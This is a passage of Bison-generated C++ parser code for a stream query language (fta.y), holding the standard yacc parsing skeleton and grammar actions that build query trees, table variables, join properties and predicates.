#define YYERROR goto yyerrorlab
#define YYRECOVERING() (!!yyerrstatus)
#define YYBACKUP(Token, Value) \
do \
if (yychar == YYEMPTY) \
{ \
yychar = (Token); \
yylval = (Value); \
YYPOPSTACK (yylen); \
yystate = *yyssp; \
goto yybackup; \
} \
else \
{ \
yyerror (YY_("syntax error: cannot back up")); \
YYERROR; \
} \
while (0)
/* Error token number */
#define YYTERROR 1
#define YYERRCODE 256
/* Enable debugging if requested. */
#if YYDEBUG
# ifndef YYFPRINTF
# include <stdio.h> /* INFRINGES ON USER NAME SPACE */
# define YYFPRINTF fprintf
# endif
# define YYDPRINTF(Args) \
do { \
if (yydebug) \
YYFPRINTF Args; \
} while (0)
/* This macro is provided for backward compatibility. */
#ifndef YY_LOCATION_PRINT
# define YY_LOCATION_PRINT(File, Loc) ((void) 0)
#endif
# define YY_SYMBOL_PRINT(Title, Type, Value, Location) \
do { \
if (yydebug) \
{ \
YYFPRINTF (stderr, "%s ", Title); \
yy_symbol_print (stderr, \
Type, Value); \
YYFPRINTF (stderr, "\n"); \
} \
} while (0)
/*----------------------------------------.
| Print this symbol's value on YYOUTPUT. |
`----------------------------------------*/
static void
yy_symbol_value_print (FILE *yyoutput, int yytype, YYSTYPE const * const yyvaluep)
{
FILE *yyo = yyoutput;
YYUSE (yyo);
if (!yyvaluep)
return;
# ifdef YYPRINT
if (yytype < YYNTOKENS)
YYPRINT (yyoutput, yytoknum[yytype], *yyvaluep);
# endif
YYUSE (yytype);
}
/*--------------------------------.
| Print this symbol on YYOUTPUT. |
`--------------------------------*/
static void
yy_symbol_print (FILE *yyoutput, int yytype, YYSTYPE const * const yyvaluep)
{
YYFPRINTF (yyoutput, "%s %s (",
yytype < YYNTOKENS ? "token" : "nterm", yytname[yytype]);
yy_symbol_value_print (yyoutput, yytype, yyvaluep);
YYFPRINTF (yyoutput, ")");
}
/*------------------------------------------------------------------.
| yy_stack_print -- Print the state stack from its BOTTOM up to its |
| TOP (included). |
`------------------------------------------------------------------*/
static void
yy_stack_print (yytype_int16 *yybottom, yytype_int16 *yytop)
{
YYFPRINTF (stderr, "Stack now");
for (; yybottom <= yytop; yybottom++)
{
int yybot = *yybottom;
YYFPRINTF (stderr, " %d", yybot);
}
YYFPRINTF (stderr, "\n");
}
# define YY_STACK_PRINT(Bottom, Top) \
do { \
if (yydebug) \
yy_stack_print ((Bottom), (Top)); \
} while (0)
/*------------------------------------------------.
| Report that the YYRULE is going to be reduced. |
`------------------------------------------------*/
static void
yy_reduce_print (yytype_int16 *yyssp, YYSTYPE *yyvsp, int yyrule)
{
unsigned long int yylno = yyrline[yyrule];
int yynrhs = yyr2[yyrule];
int yyi;
YYFPRINTF (stderr, "Reducing stack by rule %d (line %lu):\n",
yyrule - 1, yylno);
/* The symbols being reduced. */
for (yyi = 0; yyi < yynrhs; yyi++)
{
YYFPRINTF (stderr, " $%d = ", yyi + 1);
yy_symbol_print (stderr,
yystos[yyssp[yyi + 1 - yynrhs]],
&(yyvsp[(yyi + 1) - (yynrhs)])
);
YYFPRINTF (stderr, "\n");
}
}
# define YY_REDUCE_PRINT(Rule) \
do { \
if (yydebug) \
yy_reduce_print (yyssp, yyvsp, Rule); \
} while (0)
/* Nonzero means print parse trace. It is left uninitialized so that
multiple parsers can coexist. */
int yydebug;
#else /* !YYDEBUG */
# define YYDPRINTF(Args)
# define YY_SYMBOL_PRINT(Title, Type, Value, Location)
# define YY_STACK_PRINT(Bottom, Top)
# define YY_REDUCE_PRINT(Rule)
#endif /* !YYDEBUG */
/* YYINITDEPTH -- initial size of the parser's stacks. */
#ifndef YYINITDEPTH
# define YYINITDEPTH 200
#endif
/* YYMAXDEPTH -- maximum size the stacks can grow to (effective only
if the built-in stack extension method is used).
Do not make this value too large; the results are undefined if
YYSTACK_ALLOC_MAXIMUM < YYSTACK_BYTES (YYMAXDEPTH)
evaluated with infinite-precision integer arithmetic. */
#ifndef YYMAXDEPTH
# define YYMAXDEPTH 10000
#endif
#if YYERROR_VERBOSE
# ifndef yystrlen
# if defined __GLIBC__ && defined _STRING_H
# define yystrlen strlen
# else
/* Return the length of YYSTR. */
static YYSIZE_T
yystrlen (const char *yystr)
{
YYSIZE_T yylen;
for (yylen = 0; yystr[yylen]; yylen++)
continue;
return yylen;
}
# endif
# endif
# ifndef yystpcpy
# if defined __GLIBC__ && defined _STRING_H && defined _GNU_SOURCE
# define yystpcpy stpcpy
# else
/* Copy YYSRC to YYDEST, returning the address of the terminating '\0' in
YYDEST. */
static char *
yystpcpy (char *yydest, const char *yysrc)
{
char *yyd = yydest;
const char *yys = yysrc;
while ((*yyd++ = *yys++) != '\0')
continue;
return yyd - 1;
}
# endif
# endif
# ifndef yytnamerr
/* Copy to YYRES the contents of YYSTR after stripping away unnecessary
quotes and backslashes, so that it's suitable for yyerror. The
heuristic is that double-quoting is unnecessary unless the string
contains an apostrophe, a comma, or backslash (other than
backslash-backslash). YYSTR is taken from yytname. If YYRES is
null, do not copy; instead, return the length of what the result
would have been. */
static YYSIZE_T
yytnamerr (char *yyres, const char *yystr)
{
if (*yystr == '"')
{
YYSIZE_T yyn = 0;
char const *yyp = yystr;
for (;;)
switch (*++yyp)
{
case '\'':
case ',':
goto do_not_strip_quotes;
case '\\':
if (*++yyp != '\\')
goto do_not_strip_quotes;
/* Fall through. */
default:
if (yyres)
yyres[yyn] = *yyp;
yyn++;
break;
case '"':
if (yyres)
yyres[yyn] = '\0';
return yyn;
}
do_not_strip_quotes: ;
}
if (! yyres)
return yystrlen (yystr);
return yystpcpy (yyres, yystr) - yyres;
}
# endif
/* Copy into *YYMSG, which is of size *YYMSG_ALLOC, an error message
about the unexpected token YYTOKEN for the state stack whose top is
YYSSP.
Return 0 if *YYMSG was successfully written. Return 1 if *YYMSG is
not large enough to hold the message. In that case, also set
*YYMSG_ALLOC to the required number of bytes. Return 2 if the
required number of bytes is too large to store. */
static int
yysyntax_error (YYSIZE_T *yymsg_alloc, char **yymsg,
yytype_int16 *yyssp, int yytoken)
{
YYSIZE_T yysize0 = yytnamerr (YY_NULLPTR, yytname[yytoken]);
YYSIZE_T yysize = yysize0;
enum { YYERROR_VERBOSE_ARGS_MAXIMUM = 5 };
/* Internationalized format string. */
const char *yyformat = YY_NULLPTR;
/* Arguments of yyformat. */
char const *yyarg[YYERROR_VERBOSE_ARGS_MAXIMUM];
/* Number of reported tokens (one for the "unexpected", one per
"expected"). */
int yycount = 0;
/* There are many possibilities here to consider:
- If this state is a consistent state with a default action, then
the only way this function was invoked is if the default action
is an error action. In that case, don't check for expected
tokens because there are none.
- The only way there can be no lookahead present (in yychar) is if
this state is a consistent state with a default action. Thus,
detecting the absence of a lookahead is sufficient to determine
that there is no unexpected or expected token to report. In that
case, just report a simple "syntax error".
- Don't assume there isn't a lookahead just because this state is a
consistent state with a default action. There might have been a
previous inconsistent state, consistent state with a non-default
action, or user semantic action that manipulated yychar.
- Of course, the expected token list depends on states to have
correct lookahead information, and it depends on the parser not
to perform extra reductions after fetching a lookahead from the
scanner and before detecting a syntax error. Thus, state merging
(from LALR or IELR) and default reductions corrupt the expected
token list. However, the list is correct for canonical LR with
one exception: it will still contain any token that will not be
accepted due to an error action in a later state.
*/
if (yytoken != YYEMPTY)
{
int yyn = yypact[*yyssp];
yyarg[yycount++] = yytname[yytoken];
if (!yypact_value_is_default (yyn))
{
/* Start YYX at -YYN if negative to avoid negative indexes in
YYCHECK. In other words, skip the first -YYN actions for
this state because they are default actions. */
int yyxbegin = yyn < 0 ? -yyn : 0;
/* Stay within bounds of both yycheck and yytname. */
int yychecklim = YYLAST - yyn + 1;
int yyxend = yychecklim < YYNTOKENS ? yychecklim : YYNTOKENS;
int yyx;
for (yyx = yyxbegin; yyx < yyxend; ++yyx)
if (yycheck[yyx + yyn] == yyx && yyx != YYTERROR
&& !yytable_value_is_error (yytable[yyx + yyn]))
{
if (yycount == YYERROR_VERBOSE_ARGS_MAXIMUM)
{
yycount = 1;
yysize = yysize0;
break;
}
yyarg[yycount++] = yytname[yyx];
{
YYSIZE_T yysize1 = yysize + yytnamerr (YY_NULLPTR, yytname[yyx]);
if (! (yysize <= yysize1
&& yysize1 <= YYSTACK_ALLOC_MAXIMUM))
return 2;
yysize = yysize1;
}
}
}
}
switch (yycount)
{
# define YYCASE_(N, S) \
case N: \
yyformat = S; \
break
YYCASE_(0, YY_("syntax error"));
YYCASE_(1, YY_("syntax error, unexpected %s"));
YYCASE_(2, YY_("syntax error, unexpected %s, expecting %s"));
YYCASE_(3, YY_("syntax error, unexpected %s, expecting %s or %s"));
YYCASE_(4, YY_("syntax error, unexpected %s, expecting %s or %s or %s"));
YYCASE_(5, YY_("syntax error, unexpected %s, expecting %s or %s or %s or %s"));
# undef YYCASE_
}
{
YYSIZE_T yysize1 = yysize + yystrlen (yyformat);
if (! (yysize <= yysize1 && yysize1 <= YYSTACK_ALLOC_MAXIMUM))
return 2;
yysize = yysize1;
}
if (*yymsg_alloc < yysize)
{
*yymsg_alloc = 2 * yysize;
if (! (yysize <= *yymsg_alloc
&& *yymsg_alloc <= YYSTACK_ALLOC_MAXIMUM))
*yymsg_alloc = YYSTACK_ALLOC_MAXIMUM;
return 1;
}
/* Avoid sprintf, as that infringes on the user's name space.
Don't have undefined behavior even if the translation
produced a string with the wrong number of "%s"s. */
{
char *yyp = *yymsg;
int yyi = 0;
while ((*yyp = *yyformat) != '\0')
if (*yyp == '%' && yyformat[1] == 's' && yyi < yycount)
{
yyp += yytnamerr (yyp, yyarg[yyi++]);
yyformat += 2;
}
else
{
yyp++;
yyformat++;
}
}
return 0;
}
#endif /* YYERROR_VERBOSE */
/*-----------------------------------------------.
| Release the memory associated to this symbol. |
`-----------------------------------------------*/
static void
yydestruct (const char *yymsg, int yytype, YYSTYPE *yyvaluep)
{
YYUSE (yyvaluep);
if (!yymsg)
yymsg = "Deleting";
YY_SYMBOL_PRINT (yymsg, yytype, yyvaluep, yylocationp);
YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN
YYUSE (yytype);
YY_IGNORE_MAYBE_UNINITIALIZED_END
}
/* The lookahead symbol. */
int yychar;
/* The semantic value of the lookahead symbol. */
YYSTYPE yylval;
/* Number of syntax errors so far. */
int yynerrs;
/*----------.
| yyparse. |
`----------*/
int
yyparse (void)
{
int yystate;
/* Number of tokens to shift before error messages enabled. */
int yyerrstatus;
/* The stacks and their tools:
'yyss': related to states.
'yyvs': related to semantic values.
Refer to the stacks through separate pointers, to allow yyoverflow
to reallocate them elsewhere. */
/* The state stack. */
yytype_int16 yyssa[YYINITDEPTH];
yytype_int16 *yyss;
yytype_int16 *yyssp;
/* The semantic value stack. */
YYSTYPE yyvsa[YYINITDEPTH];
YYSTYPE *yyvs;
YYSTYPE *yyvsp;
YYSIZE_T yystacksize;
int yyn;
int yyresult;
/* Lookahead token as an internal (translated) token number. */
int yytoken = 0;
/* The variables used to return semantic value and location from the
action routines. */
YYSTYPE yyval;
#if YYERROR_VERBOSE
/* Buffer for error messages, and its allocated size. */
char yymsgbuf[128];
char *yymsg = yymsgbuf;
YYSIZE_T yymsg_alloc = sizeof yymsgbuf;
#endif
#define YYPOPSTACK(N) (yyvsp -= (N), yyssp -= (N))
/* The number of symbols on the RHS of the reduced rule.
Keep to zero when no symbol should be popped. */
int yylen = 0;
yyssp = yyss = yyssa;
yyvsp = yyvs = yyvsa;
yystacksize = YYINITDEPTH;
YYDPRINTF ((stderr, "Starting parse\n"));
yystate = 0;
yyerrstatus = 0;
yynerrs = 0;
yychar = YYEMPTY; /* Cause a token to be read. */
goto yysetstate;
/*------------------------------------------------------------.
| yynewstate -- Push a new state, which is found in yystate. |
`------------------------------------------------------------*/
yynewstate:
/* In all cases, when you get here, the value and location stacks
have just been pushed. So pushing a state here evens the stacks. */
yyssp++;
yysetstate:
*yyssp = yystate;
if (yyss + yystacksize - 1 <= yyssp)
{
/* Get the current used size of the three stacks, in elements. */
YYSIZE_T yysize = yyssp - yyss + 1;
#ifdef yyoverflow
{
/* Give user a chance to reallocate the stack. Use copies of
these so that the &'s don't force the real ones into
memory. */
YYSTYPE *yyvs1 = yyvs;
yytype_int16 *yyss1 = yyss;
/* Each stack pointer address is followed by the size of the
data in use in that stack, in bytes. This used to be a
conditional around just the two extra args, but that might
be undefined if yyoverflow is a macro. */
yyoverflow (YY_("memory exhausted"),
&yyss1, yysize * sizeof (*yyssp),
&yyvs1, yysize * sizeof (*yyvsp),
&yystacksize);
yyss = yyss1;
yyvs = yyvs1;
}
#else /* no yyoverflow */
# ifndef YYSTACK_RELOCATE
goto yyexhaustedlab;
# else
/* Extend the stack our own way. */
if (YYMAXDEPTH <= yystacksize)
goto yyexhaustedlab;
yystacksize *= 2;
if (YYMAXDEPTH < yystacksize)
yystacksize = YYMAXDEPTH;
{
yytype_int16 *yyss1 = yyss;
union yyalloc *yyptr =
(union yyalloc *) YYSTACK_ALLOC (YYSTACK_BYTES (yystacksize));
if (! yyptr)
goto yyexhaustedlab;
YYSTACK_RELOCATE (yyss_alloc, yyss);
YYSTACK_RELOCATE (yyvs_alloc, yyvs);
# undef YYSTACK_RELOCATE
if (yyss1 != yyssa)
YYSTACK_FREE (yyss1);
}
# endif
#endif /* no yyoverflow */
yyssp = yyss + yysize - 1;
yyvsp = yyvs + yysize - 1;
YYDPRINTF ((stderr, "Stack size increased to %lu\n",
(unsigned long int) yystacksize));
if (yyss + yystacksize - 1 <= yyssp)
YYABORT;
}
YYDPRINTF ((stderr, "Entering state %d\n", yystate));
if (yystate == YYFINAL)
YYACCEPT;
goto yybackup;
/*-----------.
| yybackup. |
`-----------*/
yybackup:
/* Do appropriate processing given the current state. Read a
lookahead token if we need one and don't already have one. */
/* First try to decide what to do without reference to lookahead token. */
yyn = yypact[yystate];
if (yypact_value_is_default (yyn))
goto yydefault;
/* Not known => get a lookahead token if don't already have one. */
/* YYCHAR is either YYEMPTY or YYEOF or a valid lookahead symbol. */
if (yychar == YYEMPTY)
{
YYDPRINTF ((stderr, "Reading a token: "));
yychar = yylex ();
}
if (yychar <= YYEOF)
{
yychar = yytoken = YYEOF;
YYDPRINTF ((stderr, "Now at end of input.\n"));
}
else
{
yytoken = YYTRANSLATE (yychar);
YY_SYMBOL_PRINT ("Next token is", yytoken, &yylval, &yylloc);
}
/* If the proper action on seeing token YYTOKEN is to reduce or to
detect an error, take that action. */
yyn += yytoken;
if (yyn < 0 || YYLAST < yyn || yycheck[yyn] != yytoken)
goto yydefault;
yyn = yytable[yyn];
if (yyn <= 0)
{
if (yytable_value_is_error (yyn))
goto yyerrlab;
yyn = -yyn;
goto yyreduce;
}
/* Count tokens shifted since error; after three, turn off error
status. */
if (yyerrstatus)
yyerrstatus--;
/* Shift the lookahead token. */
YY_SYMBOL_PRINT ("Shifting", yytoken, &yylval, &yylloc);
/* Discard the shifted token. */
yychar = YYEMPTY;
yystate = yyn;
YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN
*++yyvsp = yylval;
YY_IGNORE_MAYBE_UNINITIALIZED_END
goto yynewstate;
/*-----------------------------------------------------------.
| yydefault -- do the default action for the current state. |
`-----------------------------------------------------------*/
yydefault:
yyn = yydefact[yystate];
if (yyn == 0)
goto yyerrlab;
goto yyreduce;
/*-----------------------------.
| yyreduce -- Do a reduction. |
`-----------------------------*/
yyreduce:
/* yyn is the number of a rule to reduce with. */
yylen = yyr2[yyn];
/* If YYLEN is nonzero, implement the default value of the action:
'$$ = $1'.
Otherwise, the following line sets YYVAL to garbage.
This behavior is undocumented and Bison
users should not rely upon it. Assigning to YYVAL
unconditionally makes the parser a bit smaller, and it avoids a
GCC warning that YYVAL may be used uninitialized. */
yyval = yyvsp[1-yylen];
YY_REDUCE_PRINT (yyn);
switch (yyn)
{
case 2:
#line 206 "fta.y" /* yacc.c:1646 */
{
fta_parse_result->parse_tree_list = (yyvsp[0].q_list);
fta_parse_result->tables = NULL;
fta_parse_result->parse_type = QUERY_PARSE;
}
#line 1699 "fta.tab.cc" /* yacc.c:1646 */
break;
case 3:
#line 211 "fta.y" /* yacc.c:1646 */
{
fta_parse_result->parse_tree_list = NULL;
fta_parse_result->fta_parse_tree = NULL;
fta_parse_result->tables = (yyvsp[0].table_list_schema);
fta_parse_result->parse_type = TABLE_PARSE;
}
#line 1710 "fta.tab.cc" /* yacc.c:1646 */
break;
case 4:
#line 218 "fta.y" /* yacc.c:1646 */
{
fta_parse_result->parse_tree_list = NULL;
fta_parse_result->fta_parse_tree = (yyvsp[-1].tblp);
fta_parse_result->tables = (yyvsp[-2].table_list_schema);
fta_parse_result->parse_type = STREAM_PARSE;
}
#line 1721 "fta.tab.cc" /* yacc.c:1646 */
break;
case 5:
#line 232 "fta.y" /* yacc.c:1646 */
{
(yyvsp[0].tblp)->add_nmap((yyvsp[-2].var_defs)); // Memory leak : plug it.
(yyvsp[0].tblp)->add_param_list((yyvsp[-1].var_defs)); // Memory leak : plug it.
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1731 "fta.tab.cc" /* yacc.c:1646 */
break;
case 6:
#line 237 "fta.y" /* yacc.c:1646 */
{
(yyvsp[0].tblp)->add_nmap((yyvsp[-1].var_defs)); // Memory leak : plug it.
(yyvsp[0].tblp)->add_param_list((yyvsp[-2].var_defs)); // Memory leak : plug it.
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1741 "fta.tab.cc" /* yacc.c:1646 */
break;
case 7:
#line 242 "fta.y" /* yacc.c:1646 */
{
(yyvsp[0].tblp)->add_nmap(NULL); // Memory leak : plug it.
(yyvsp[0].tblp)->add_param_list((yyvsp[-1].var_defs)); // Memory leak : plug it.
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1751 "fta.tab.cc" /* yacc.c:1646 */
break;
case 8:
#line 247 "fta.y" /* yacc.c:1646 */
{
(yyvsp[0].tblp)->add_nmap((yyvsp[-1].var_defs)); // Memory leak : plug it.
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1760 "fta.tab.cc" /* yacc.c:1646 */
break;
case 9:
#line 251 "fta.y" /* yacc.c:1646 */
{
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1768 "fta.tab.cc" /* yacc.c:1646 */
break;
case 10:
#line 254 "fta.y" /* yacc.c:1646 */
{
(yyvsp[0].tblp)->add_nmap((yyvsp[-2].var_defs)); // Memory leak : plug it.
(yyvsp[0].tblp)->add_param_list((yyvsp[-1].var_defs)); // Memory leak : plug it.
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1778 "fta.tab.cc" /* yacc.c:1646 */
break;
case 11:
#line 259 "fta.y" /* yacc.c:1646 */
{
(yyvsp[0].tblp)->add_nmap((yyvsp[-1].var_defs)); // Memory leak : plug it.
(yyvsp[0].tblp)->add_param_list((yyvsp[-2].var_defs)); // Memory leak : plug it.
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1788 "fta.tab.cc" /* yacc.c:1646 */
break;
case 12:
#line 264 "fta.y" /* yacc.c:1646 */
{
(yyvsp[0].tblp)->add_param_list((yyvsp[-1].var_defs)); // Memory leak : plug it.
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1797 "fta.tab.cc" /* yacc.c:1646 */
break;
case 13:
#line 268 "fta.y" /* yacc.c:1646 */
{
(yyvsp[0].tblp)->add_nmap((yyvsp[-1].var_defs)); // Memory leak : plug it.
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1806 "fta.tab.cc" /* yacc.c:1646 */
break;
case 14:
#line 272 "fta.y" /* yacc.c:1646 */
{
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1814 "fta.tab.cc" /* yacc.c:1646 */
break;
case 15:
#line 275 "fta.y" /* yacc.c:1646 */
{
(yyvsp[0].tblp)->add_nmap((yyvsp[-2].var_defs)); // Memory leak : plug it.
(yyvsp[0].tblp)->add_param_list((yyvsp[-1].var_defs)); // Memory leak : plug it.
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1824 "fta.tab.cc" /* yacc.c:1646 */
break;
case 16:
#line 280 "fta.y" /* yacc.c:1646 */
{
(yyvsp[0].tblp)->add_nmap((yyvsp[-1].var_defs)); // Memory leak : plug it.
(yyvsp[0].tblp)->add_param_list((yyvsp[-2].var_defs)); // Memory leak : plug it.
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1834 "fta.tab.cc" /* yacc.c:1646 */
break;
case 17:
#line 285 "fta.y" /* yacc.c:1646 */
{
(yyvsp[0].tblp)->add_param_list((yyvsp[-1].var_defs)); // Memory leak : plug it.
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1843 "fta.tab.cc" /* yacc.c:1646 */
break;
case 18:
#line 289 "fta.y" /* yacc.c:1646 */
{
(yyvsp[0].tblp)->add_nmap((yyvsp[-1].var_defs)); // Memory leak : plug it.
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1852 "fta.tab.cc" /* yacc.c:1646 */
break;
case 19:
#line 293 "fta.y" /* yacc.c:1646 */
{
(yyval.tblp) = (yyvsp[0].tblp);
}
#line 1860 "fta.tab.cc" /* yacc.c:1646 */
break;
case 20:
#line 298 "fta.y" /* yacc.c:1646 */
{(yyval.q_list) = new query_list_t((yyvsp[0].tblp));}
#line 1866 "fta.tab.cc" /* yacc.c:1646 */
break;
case 21:
#line 299 "fta.y" /* yacc.c:1646 */
{(yyval.q_list) = (yyvsp[-2].q_list)->append((yyvsp[0].tblp));}
#line 1872 "fta.tab.cc" /* yacc.c:1646 */
break;
case 22:
#line 303 "fta.y" /* yacc.c:1646 */
{(yyval.var_defs)=(yyvsp[-1].var_defs);}
#line 1878 "fta.tab.cc" /* yacc.c:1646 */
break;
case 23:
#line 304 "fta.y" /* yacc.c:1646 */
{(yyval.var_defs)=NULL;}
#line 1884 "fta.tab.cc" /* yacc.c:1646 */
break;
case 24:
#line 308 "fta.y" /* yacc.c:1646 */
{(yyval.var_defs)=(yyvsp[-1].var_defs);fta_parse_defines=(yyvsp[-1].var_defs);}
#line 1890 "fta.tab.cc" /* yacc.c:1646 */
break;
case 25:
#line 309 "fta.y" /* yacc.c:1646 */
{(yyval.var_defs)=NULL;fta_parse_defines = NULL;}
#line 1896 "fta.tab.cc" /* yacc.c:1646 */
break;
case 26:
#line 313 "fta.y" /* yacc.c:1646 */
{(yyval.var_defs) = new var_defs_t((yyvsp[0].var_pair));}
#line 1902 "fta.tab.cc" /* yacc.c:1646 */
break;
case 27:
#line 314 "fta.y" /* yacc.c:1646 */
{(yyval.var_defs) = (yyvsp[-1].var_defs)->add_var_pair((yyvsp[0].var_pair));}
#line 1908 "fta.tab.cc" /* yacc.c:1646 */
break;
case 28:
#line 318 "fta.y" /* yacc.c:1646 */
{(yyval.var_pair) = new var_pair_t((yyvsp[-2].strval),(yyvsp[-1].strval));}
#line 1914 "fta.tab.cc" /* yacc.c:1646 */
break;
case 29:
#line 319 "fta.y" /* yacc.c:1646 */
{(yyval.var_pair) = new var_pair_t((yyvsp[-2].strval),(yyvsp[-1].strval));}
#line 1920 "fta.tab.cc" /* yacc.c:1646 */
break;
case 30:
#line 323 "fta.y" /* yacc.c:1646 */
{(yyval.tblp) = (yyvsp[0].tblp)->add_selection((yyvsp[-1].select_listval));}
#line 1926 "fta.tab.cc" /* yacc.c:1646 */
break;
case 31:
#line 328 "fta.y" /* yacc.c:1646 */
{(yyval.tblp) = new table_exp_t((yyvsp[-1].clist),(yyvsp[0].tbl_list));}
#line 1932 "fta.tab.cc" /* yacc.c:1646 */
break;
case 32:
#line 330 "fta.y" /* yacc.c:1646 */
{(yyval.tblp) = new table_exp_t((yyvsp[-3].clist),(yyvsp[-1].scalarval),(yyvsp[0].tbl_list));}
#line 1938 "fta.tab.cc" /* yacc.c:1646 */
break;
case 33:
#line 335 "fta.y" /* yacc.c:1646 */
{(yyval.tblp) = table_exp_t::make_watchlist_tbl((yyvsp[-1].field_list_t)); }
#line 1944 "fta.tab.cc" /* yacc.c:1646 */
break;
case 34:
#line 342 "fta.y" /* yacc.c:1646 */
{ (yyval.select_listval) = (yyvsp[0].select_listval);}
#line 1950 "fta.tab.cc" /* yacc.c:1646 */
break;
case 35:
#line 354 "fta.y" /* yacc.c:1646 */
{(yyval.tblp)=new table_exp_t((yyvsp[-7].tbl_list),(yyvsp[-6].predp),(yyvsp[-5].extended_gb_list),(yyvsp[-4].clist),(yyvsp[-3].predp),(yyvsp[-2].predp),(yyvsp[-1].predp), (yyvsp[0].predp));}
#line 1956 "fta.tab.cc" /* yacc.c:1646 */
break;
case 36:
#line 358 "fta.y" /* yacc.c:1646 */
{(yyval.tbl_list) = (yyvsp[0].tbl_list); (yyval.tbl_list)->set_properties(-1);}
#line 1962 "fta.tab.cc" /* yacc.c:1646 */
break;
case 37:
#line 359 "fta.y" /* yacc.c:1646 */
{(yyval.tbl_list) = (yyvsp[0].tbl_list); (yyval.tbl_list)->set_properties(INNER_JOIN_PROPERTY);}
#line 1968 "fta.tab.cc" /* yacc.c:1646 */
break;
case 38:
#line 360 "fta.y" /* yacc.c:1646 */
{(yyval.tbl_list) = (yyvsp[0].tbl_list); (yyval.tbl_list)->set_properties(OUTER_JOIN_PROPERTY);}
#line 1974 "fta.tab.cc" /* yacc.c:1646 */
break;
case 39:
#line 361 "fta.y" /* yacc.c:1646 */
{(yyval.tbl_list) = (yyvsp[0].tbl_list); (yyval.tbl_list)->set_properties(RIGHT_OUTER_JOIN_PROPERTY);}
#line 1980 "fta.tab.cc" /* yacc.c:1646 */
break;
case 40:
#line 362 "fta.y" /* yacc.c:1646 */
{(yyval.tbl_list) = (yyvsp[0].tbl_list); (yyval.tbl_list)->set_properties(LEFT_OUTER_JOIN_PROPERTY);}
#line 1986 "fta.tab.cc" /* yacc.c:1646 */
break;
case 41:
#line 363 "fta.y" /* yacc.c:1646 */
{(yyval.tbl_list) = (yyvsp[0].tbl_list); (yyval.tbl_list)->set_properties(WATCHLIST_JOIN_PROPERTY);}
#line 1992 "fta.tab.cc" /* yacc.c:1646 */
break;
case 42:
#line 364 "fta.y" /* yacc.c:1646 */
{(yyval.tbl_list) = (yyvsp[0].tbl_list); (yyval.tbl_list)->set_properties(FILTER_JOIN_PROPERTY); (yyval.tbl_list)->set_colref((yyvsp[-5].colref)); (yyval.tbl_list)->set_temporal_range((yyvsp[-3].strval));}
#line 1998 "fta.tab.cc" /* yacc.c:1646 */
break;
case 43:
#line 368 "fta.y" /* yacc.c:1646 */
{(yyval.tbl_list) = new tablevar_list_t((yyvsp[0].table));}
#line 2004 "fta.tab.cc" /* yacc.c:1646 */
break;
case 44:
#line 369 "fta.y" /* yacc.c:1646 */
{(yyval.tbl_list)= (yyvsp[-2].tbl_list)->append_table((yyvsp[0].table));}
#line 2010 "fta.tab.cc" /* yacc.c:1646 */
break;
case 45:
#line 373 "fta.y" /* yacc.c:1646 */
{ (yyval.table) = (yyvsp[0].table);}
#line 2016 "fta.tab.cc" /* yacc.c:1646 */
break;
case 46:
#line 374 "fta.y" /* yacc.c:1646 */
{ (yyval.table)= (yyvsp[-1].table)->set_range_var((yyvsp[0].strval));}
#line 2022 "fta.tab.cc" /* yacc.c:1646 */
break;
case 47:
#line 378 "fta.y" /* yacc.c:1646 */
{(yyval.table) = new tablevar_t((yyvsp[0].stringval)->c_str());}
#line 2028 "fta.tab.cc" /* yacc.c:1646 */
break;
case 48:
#line 379 "fta.y" /* yacc.c:1646 */
{(yyval.table) = new tablevar_t((yyvsp[-2].strval),(yyvsp[0].stringval)->c_str(),0);}
#line 2034 "fta.tab.cc" /* yacc.c:1646 */
break;
case 49:
#line 380 "fta.y" /* yacc.c:1646 */
{(yyval.table) = new tablevar_t((yyvsp[-4].strval),(yyvsp[-2].strval),(yyvsp[0].stringval)->c_str());}
#line 2040 "fta.tab.cc" /* yacc.c:1646 */
break;
case 50:
#line 381 "fta.y" /* yacc.c:1646 */
{(yyval.table) = new tablevar_t((yyvsp[-4].strval),(yyvsp[-2].strval),(yyvsp[0].stringval)->c_str());}
#line 2046 "fta.tab.cc" /* yacc.c:1646 */
break;
case 51:
#line 382 "fta.y" /* yacc.c:1646 */
{(yyval.table) = new tablevar_t((yyvsp[-3].strval),(yyvsp[0].stringval)->c_str(),1);}
#line 2052 "fta.tab.cc" /* yacc.c:1646 */
break;
case 52:
#line 386 "fta.y" /* yacc.c:1646 */
{(yyval.stringval) = new string_t((yyvsp[0].strval));}
#line 2058 "fta.tab.cc" /* yacc.c:1646 */
break;
case 53:
#line 387 "fta.y" /* yacc.c:1646 */
{(yyval.stringval) = (yyval.stringval)->append("/",(yyvsp[0].strval));}
#line 2064 "fta.tab.cc" /* yacc.c:1646 */
break;
case 54:
#line 392 "fta.y" /* yacc.c:1646 */
{(yyval.predp)=NULL;}
#line 2070 "fta.tab.cc" /* yacc.c:1646 */
break;
case 55:
#line 393 "fta.y" /* yacc.c:1646 */
{(yyval.predp)=(yyvsp[0].predp);}
#line 2076 "fta.tab.cc" /* yacc.c:1646 */
break;
case 56:
#line 397 "fta.y" /* yacc.c:1646 */
{(yyval.predp) = (yyvsp[0].predp);}
#line 2082 "fta.tab.cc" /* yacc.c:1646 */
break;
case 57:
#line 401 "fta.y" /* yacc.c:1646 */
{(yyval.predp)=NULL;}
#line 2088 "fta.tab.cc" /* yacc.c:1646 */
break;
case 58:
#line 402 "fta.y" /* yacc.c:1646 */
{(yyval.predp)=(yyvsp[0].predp); }
#line 2094 "fta.tab.cc" /* yacc.c:1646 */
break;
case 59:
#line 406 "fta.y" /* yacc.c:1646 */
{(yyval.predp)=NULL;}
#line 2100 "fta.tab.cc" /* yacc.c:1646 */
break;
case 60:
#line 407 "fta.y" /* yacc.c:1646 */
{(yyval.predp)=(yyvsp[0].predp); }
